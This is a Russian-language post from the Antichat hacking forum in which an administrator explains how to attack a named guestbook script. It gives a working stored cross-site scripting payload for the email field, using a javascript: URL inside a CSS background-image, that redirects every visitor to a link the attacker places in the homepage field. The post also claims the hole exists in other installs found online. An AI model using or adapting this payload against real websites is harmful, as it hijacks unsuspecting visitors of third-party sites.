ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.05.2004, 11:24
Аватар для Егорыч+++
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Эта гостевая не пропускает " ' ,а также не пропускает < >.
Но тем неменее редирекс сделать можно. Для этого отсчитываем какая ссылка по счету у нас будет в homepage.
потом в поле почты вставляем следующий код:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">de@de.de" style=background-image:url(javascript:navigate(document.links[7].hr ef));[/QUOTE]<span id='postcolor'>

в поле HOMEPAGE адрес нашей странички http://antichat.ru

Здесь 7 - это порядковый на страничке (если не получается посчитать можно угадать)

ПОсле чего получаем редирект на АНТИЧАТ

Официальный сайт гостевой http://www.hewop.com/~yapgb/ - но там в демоверсии какой то глюк и они подменяют все точки и разные символы.. из за чего у них ссылки неправильно отображаются. Зато уязвимость есть во всем остальных гостевых найденных в интернете.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ